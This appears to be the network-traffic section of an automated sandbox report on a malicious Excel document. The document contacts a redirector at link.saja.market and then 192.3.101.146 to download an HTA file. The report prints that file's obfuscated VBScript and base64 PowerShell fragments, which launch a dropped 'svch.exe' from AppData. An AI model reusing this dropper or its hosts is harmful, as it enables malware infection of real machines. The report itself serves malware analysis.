                                          Mar 17, 2025 09:28:31.436662912 CET1.1.1.1192.168.2.120x2310No error (0)s-0005.dual-s-dc-msedge.net52.123.131.14A (IP address)IN (0x0001)false
                                          Mar 17, 2025 09:28:31.436662912 CET1.1.1.1192.168.2.120x2310No error (0)s-0005.dual-s-dc-msedge.net52.123.130.14A (IP address)IN (0x0001)false
                                          Mar 17, 2025 09:28:33.039277077 CET1.1.1.1192.168.2.120x3827No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                          Mar 17, 2025 09:28:33.039277077 CET1.1.1.1192.168.2.120x3827No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                          Mar 17, 2025 09:29:01.568686962 CET1.1.1.1192.168.2.120xb44dNo error (0)otelrules.svc.static.microsoftotelrules-bzhndjfje8dvh5fd.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                          Mar 17, 2025 09:29:01.568686962 CET1.1.1.1192.168.2.120xb44dNo error (0)otelrules-bzhndjfje8dvh5fd.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                          Mar 17, 2025 09:29:01.568686962 CET1.1.1.1192.168.2.120xb44dNo error (0)star-azurefd-prod.trafficmanager.netshed.dual-low.s-part-0032.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                          Mar 17, 2025 09:29:01.568686962 CET1.1.1.1192.168.2.120xb44dNo error (0)shed.dual-low.s-part-0032.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                          Mar 17, 2025 09:29:01.568686962 CET1.1.1.1192.168.2.120xb44dNo error (0)azurefd-t-fb-prod.trafficmanager.netdual.s-part-0044.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                          Mar 17, 2025 09:29:01.568686962 CET1.1.1.1192.168.2.120xb44dNo error (0)dual.s-part-0044.t-0009.fb-t-msedge.nets-part-0044.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                          Mar 17, 2025 09:29:01.568686962 CET1.1.1.1192.168.2.120xb44dNo error (0)s-part-0044.t-0009.fb-t-msedge.net13.107.253.72A (IP address)IN (0x0001)false
                                          Mar 17, 2025 09:29:27.787823915 CET1.1.1.1192.168.2.120x68b6No error (0)link.saja.marketistio.saja.marketCNAME (Canonical name)IN (0x0001)false
                                          Mar 17, 2025 09:29:27.787823915 CET1.1.1.1192.168.2.120x68b6No error (0)istio.saja.marketservice-eks-nlb-public-0b7cb0a32741e125.elb.ap-northeast-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                          Mar 17, 2025 09:29:27.787823915 CET1.1.1.1192.168.2.120x68b6No error (0)service-eks-nlb-public-0b7cb0a32741e125.elb.ap-northeast-2.amazonaws.com3.39.153.44A (IP address)IN (0x0001)false
                                          Mar 17, 2025 09:29:27.787823915 CET1.1.1.1192.168.2.120x68b6No error (0)service-eks-nlb-public-0b7cb0a32741e125.elb.ap-northeast-2.amazonaws.com3.39.89.152A (IP address)IN (0x0001)false
                                          Mar 17, 2025 09:29:36.911876917 CET1.1.1.1192.168.2.120xda5cNo error (0)otelrules.svc.static.microsoftotelrules-bzhndjfje8dvh5fd.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                          Mar 17, 2025 09:29:36.911876917 CET1.1.1.1192.168.2.120xda5cNo error (0)otelrules-bzhndjfje8dvh5fd.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                          Mar 17, 2025 09:29:36.911876917 CET1.1.1.1192.168.2.120xda5cNo error (0)star-azurefd-prod.trafficmanager.netshed.dual-low.s-part-0032.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                          Mar 17, 2025 09:29:36.911876917 CET1.1.1.1192.168.2.120xda5cNo error (0)shed.dual-low.s-part-0032.t-0009.t-msedge.nets-part-0032.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                          Mar 17, 2025 09:29:36.911876917 CET1.1.1.1192.168.2.120xda5cNo error (0)s-part-0032.t-0009.t-msedge.net13.107.246.60A (IP address)IN (0x0001)false

                                          HTTP Request Dependency Graph

                                          • link.saja.market
                                          • otelrules.svc.static.microsoft
                                          • 192.3.101.146

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.1249763192.3.101.146806800C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                          TimestampBytes transferredDirectionData
                                          Mar 17, 2025 09:29:29.348325014 CET259OUTGET /xampp/nice/niceskillgivenmebestskillforever.hta?&fragrance=plausible HTTP/1.1
                                          Accept: */*
                                          Accept-Encoding: gzip, deflate
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                          Connection: Keep-Alive
                                          Host: 192.3.101.146
                                          Mar 17, 2025 09:29:29.839521885 CET1236INHTTP/1.1 200 OK
                                          Date: Mon, 17 Mar 2025 08:29:29 GMT
                                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                          Last-Modified: Mon, 17 Mar 2025 03:22:53 GMT
                                          ETag: "39b3-630814dc204a8"
                                          Accept-Ranges: bytes
                                          Content-Length: 14771
                                          Keep-Alive: timeout=5, max=100
                                          Connection: Keep-Alive
                                          Content-Type: application/hta
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 6d 75 6c 61 74 65 49 45 38 22 20 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 73 63 72 69 70 74 20 4c 61 6e 67 75 41 47 65 3d 22 76 62 53 43 72 49 50 54 22 3e 0d 0a 64 69 4d 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 [TRUNCATED]
                                          Data Ascii: <!DOCTYPE html><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" ><html><body><script LanguAGe="vbSCrIPT">diMponnrdwwbCxebTNECwYDcWNFeNPjyAeVITvbwHgWJgksIHxvrvdeZEsZiGQnPQqMCiLBBvBEixaLnNtRBvsqeaXMzcvULCCTLPmJXBiOnhUefubpUfShHrblQKEYCRoMZwZuXgEVNUUtyIYimgFyVNhTWkvvCUcMgMZDQto,
                                          Mar 17, 2025 09:29:29.839536905 CET224INData Raw: 09 09 09 09 09 09 09 09 09 09 09 6f 4e 4a 69 47 45 50 70 67 41 57 75 78 52 6a 64 73 49 76 44 46 57 51 64 6e 52 50 6a 61 43 62 4c 5a 5a 4e 4c 4b 61 76 49 69 53 79 66 77 4a 76 6f 6d 43 68 6c 62 41 47 64 64 5a 42 76 59 41 7a 70 75 78 72 5a 57 71 4a
                                          Data Ascii: oNJiGEPpgAWuxRjdsIvDFWQdnRPjaCbLZZNLKavIiSyfwJvomChlbAGddZBvYAzpuxrZWqJvsaPHgEIFadmfbEgjMSuBGJDnTXdZiNLdfNFdyRfEbZqmzzzZHkbATrwhQoHNsIKhPUAtrLVNNgcItxTYlQgvFOlzIiKrunP
                                          Mar 17, 2025 09:29:29.839549065 CET1236INData Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                                          Data Ascii: :
                                          Mar 17, 2025 09:29:29.839632034 CET1236INData Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                                          Data Ascii: (
                                          Mar 17, 2025 09:29:29.839643955 CET1236INData Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 3a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                                          Data Ascii: :oNJiGEPpgAWuxRjdsI
                                          Mar 17, 2025 09:29:29.839656115 CET1236INData Raw: 5d 35 38 2b 27 75 74 46 38 2e 67 65 54 53 54 52 49 4e 47 28 5b 53 59 73 74 65 6d 2e 63 4f 6e 56 65 72 54 5d 27 2b 5b 43 68 61 72 5d 35 38 2b 5b 63 48 61 72 5d 30 58 33 41 2b 27 46 72 4f 6d 42 41 73 45 36 34 73 54 72 49 6e 47 28 27 2b 5b 43 48 41
                                          Data Ascii: ]58+'utF8.geTSTRING([SYstem.cOnVerT]'+[Char]58+[cHar]0X3A+'FrOmBAsE64sTrInG('+[CHAr]0X22+'JHZNT2oyQSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI
                                          Mar 17, 2025 09:29:29.839672089 CET1236INData Raw: 78 7a 64 6d 4e 6f 4c 6d 56 34 5a 53 49 73 4d 43 77 77 4b 54 74 54 64 45 46 79 64 43 31 54 54 45 56 46 55 43 67 7a 4b 54 74 4a 62 6c 5a 50 61 30 55 74 53 56 52 46 54 53 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67
                                          Data Ascii: xzdmNoLmV4ZSIsMCwwKTtTdEFydC1TTEVFUCgzKTtJblZPa0UtSVRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN2Y2guZXhlIg=='+[CHaR]0X22+'))')))"
                                          Mar 17, 2025 09:29:29.839684963 CET1236INData Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                                          Data Ascii: 34
                                          Mar 17, 2025 09:29:29.839698076 CET776INData Raw: 44 29 20 26 20 43 68 72 57 28 26 48 35 33 29 20 26 20 43 68 72 57 28 26 48 35 30 29 20 26 20 43 68 72 57 28 26 48 34 35 29 20 26 20 43 68 72 28 26 48 36 33 29 20 26 20 43 68 72 28 26 48 32 35 29 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                                          Data Ascii: D) & ChrW(&H53) & ChrW(&H50) & ChrW(&H45) & Chr(&H63) & Chr(&H25)
                                          Mar 17, 2025 09:29:29.839709997 CET1236INData Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                                          Data Ascii: (
                                          Mar 17, 2025 09:29:29.844269037 CET1236INData Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                                          Data Ascii: 34


                                          HTTPS Proxied Packets

                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.12497623.39.153.444436800C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                          TimestampBytes transferredDirectionData
                                          2025-03-17 08:29:29 UTC223OUTGET /LUVLQ8X6l6?&peak=sour&eardrum HTTP/1.1
                                          Accept: */*
                                          Accept-Encoding: gzip, deflate
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                          Host: link.saja.market
                                          Connection: Keep-Alive
                                          2025-03-17 08:29:29 UTC526INHTTP/1.1 302 Found
                                          Date: Mon, 17 Mar 2025 08:29:29 GMT
                                          Content-Type: text/plain; charset=utf-8
                                          Content-Length: 111
                                          Connection: close
                                          x-dns-prefetch-control: off
                                          x-frame-options: SAMEORIGIN
                                          strict-transport-security: max-age=15552000; includeSubDomains
                                          x-download-options: noopen
                                          x-content-type-options: nosniff
                                          x-xss-protection: 1; mode=block
                                          location: http://192.3.101.146/xampp/nice/niceskillgivenmebestskillforever.hta?&fragrance=plausible
                                          vary: Accept
                                          x-envoy-upstream-service-time: 7
                                          server: istio-envoy
                                          2025-03-17 08:29:29 UTC111INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 31 30 31 2e 31 34 36 2f 78 61 6d 70 70 2f 6e 69 63 65 2f 6e 69 63 65 73 6b 69 6c 6c 67 69 76 65 6e 6d 65 62 65 73 74 73 6b 69 6c 6c 66 6f 72 65 76 65 72 2e 68 74 61 3f 26 66 72 61 67 72 61 6e 63 65 3d 70 6c 61 75 73 69 62 6c 65
                                          Data Ascii: Found. Redirecting to http://192.3.101.146/xampp/nice/niceskillgivenmebestskillforever.hta?&fragrance=plausible


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          1192.168.2.124976413.107.246.604436800C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                          TimestampBytes transferredDirectionData
                                          2025-03-17 08:29:37 UTC226OUTGET /rules/excel.exe-Production-v19.bundle HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                                          Host: otelrules.svc.static.microsoft
                                          2025-03-17 08:29:37 UTC493INHTTP/1.1 200 OK
                                          Date: Mon, 17 Mar 2025 08:29:37 GMT
                                          Content-Type: text/plain
                                          Content-Length: 1114783
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public
                                          Last-Modified: Mon, 17 Mar 2025 00:15:55 GMT
                                          ETag: "0x8DD64E8E2A782F5"
                                          x-ms-request-id: 2689232f-001e-0082-4716-975880000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20250317T082937Z-186895dd8bd77tnghC1EWRfgvg000000036g000000000aw1
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2025-03-17 08:29:37 UTC15891INData Raw: 31 30 30 30 34 32 76 32 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 34 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 55 58 2e 44 65 73 6b 74 6f 70 2e 4f 66 66 69 63 65 54 68 65 6d 65 2e 41 70 70 2e 49 6e 69 74 22 20 41 54 54 3d 22 63 34 33 38 38 63 39 37 37 32 39 37 34 31 33 62 62 30 35 34 62 61 64 31 61 63 66 30 61 64 65 31 2d 63 63 35 38 65 35 33 65 2d 66 35 61 34 2d 34 66 33 37 2d 62 30 64 32 2d 39 61 38 30 37 39 65 33 34 34 32 30 2d 36 38 37 39 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 63 6d 39 79 35
                                          Data Ascii: 100042v2+<?xml version="1.0" encoding="utf-8"?><R Id="100042" V="2" DC="SM" EN="Office.UX.Desktop.OfficeTheme.App.Init" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="cm9y5
                                          2025-03-17 08:29:37 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 30 31 31 37 76 30 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 31 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 38 79 6c 6c 66 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 56 20 56 3d 22 43 6c 69 63 6b 22 20 54 3d 22 57 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32
                                          Data Ascii: /> </T></R><$!#>100117v0+<?xml version="1.0" encoding="utf-8"?><R Id="100117" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="8yllf" /> </S> <C T="W" I="0" O="false"> <V V="Click" T="W" /> </C> <C T="U32
                                          2025-03-17 08:29:37 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 33 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 37 38 31 76 31 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 37 38 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 62 67 6f 34 74 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 68 6c 76 79 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 49 33 32
                                          Data Ascii: </C> <T> <S T="2" /> <S T="3" /> </T></R><$!#>10781v1+<?xml version="1.0" encoding="utf-8"?><R Id="10781" V="1" DC="SM" T="Subrule" xmlns=""> <S> <UTS T="1" Id="bgo4t" /> <UTS T="2" Id="bhlvy" /> </S> <C T="I32
                                          2025-03-17 08:29:37 UTC16384INData Raw: 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 31 30 30 30 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c
                                          Data Ascii: <L> <O T="GT"> <L> <S T="1" F="0" /> </L> <R> <V V="1000" T="U32" /> </R> </O> </L> <R> <O T="LE"> <
                                          2025-03-17 08:29:37 UTC16384INData Raw: 20 49 3d 22 32 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 56 69 64 65 6f 43 61 6c 6c 56 69 64 65 6f 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 32 36 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 33 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 53 61 53 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 34 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 4f 76 65 72 66 6c 6f 77 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54
                                          Data Ascii: I="22" O="false" N="FlyoutVideoCallVideo"> <C> <S T="26" /> </C> </C> <C T="U32" I="23" O="false" N="FlyoutSaS"> <C> <S T="27" /> </C> </C> <C T="U32" I="24" O="false" N="FlyoutOverflow"> <C> <S T
                                          2025-03-17 08:29:37 UTC16384INData Raw: 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 39 30 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 4e 44 42 2e 55 6e 6b 6e 6f 77 6e 2e 43 6f 72 72 75 70 74 69 6f 6e 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 53 3d 22 31 30 30 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 45 74 77 20 54 3d 22 31 22 20 45 3d 22 33 39 35 22 20 47 3d 22 7b 32 61 64 66 38 65 32 33 2d 30 61 66 39 2d
                                          Data Ascii: coding="utf-8"?><R Id="10907" V="0" DC="SM" EN="Office.Outlook.Desktop.NDB.Unknown.Corruption" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" S="100" DCa="PSU" xmlns=""> <S> <Etw T="1" E="395" G="{2adf8e23-0af9-
                                          2025-03-17 08:29:37 UTC16384INData Raw: 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 33 22 20 49 64 3d 22 62 70 66 79 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 34 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 50 68 6f 74 6f 53 69 7a 65 49 6e 42 79 74 65 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 30 22 20 54 3d 22 55 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55
                                          Data Ascii: "TelemetryShutdown" /> <UTS T="3" Id="bpfy1" /> <F T="4"> <O T="GT"> <L> <S T="3" F="PhotoSizeInBytes" /> </L> <R> <V V="0" T="U64" /> </R> </O> </F> </S> <C T="U
                                          2025-03-17 08:29:37 UTC16384INData Raw: 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 65 76 65 6e 74 49 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 31 33 35 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 74 63 69 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20
                                          Data Ascii: <L> <S T="4" F="eventId" /> </L> <R> <V V="135" T="I32" /> </R> </O> </F> <F T="7"> <O T="EQ"> <L> <S T="5" F="tcid" /> </L> <R> <V
                                          2025-03-17 08:29:37 UTC16384INData Raw: 0d 0a 20 20 20 20 3c 46 20 54 3d 22 31 30 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 46 69 6c 65 50 72 6f 74 65 63 74 69 6f 6e 53 74 61 74 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 35 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 4f 66 54 68 72 6f 77 6e 45 78 63 65 70 74 69 6f 6e 22 3e 0d
                                          Data Ascii: <F T="10"> <O T="EQ"> <L> <S T="3" F="FileProtectionState" /> </L> <R> <V V="5" T="U32" /> </R> </O> </F> </S> <C T="U32" I="0" O="false" N="CountOfThrownException">
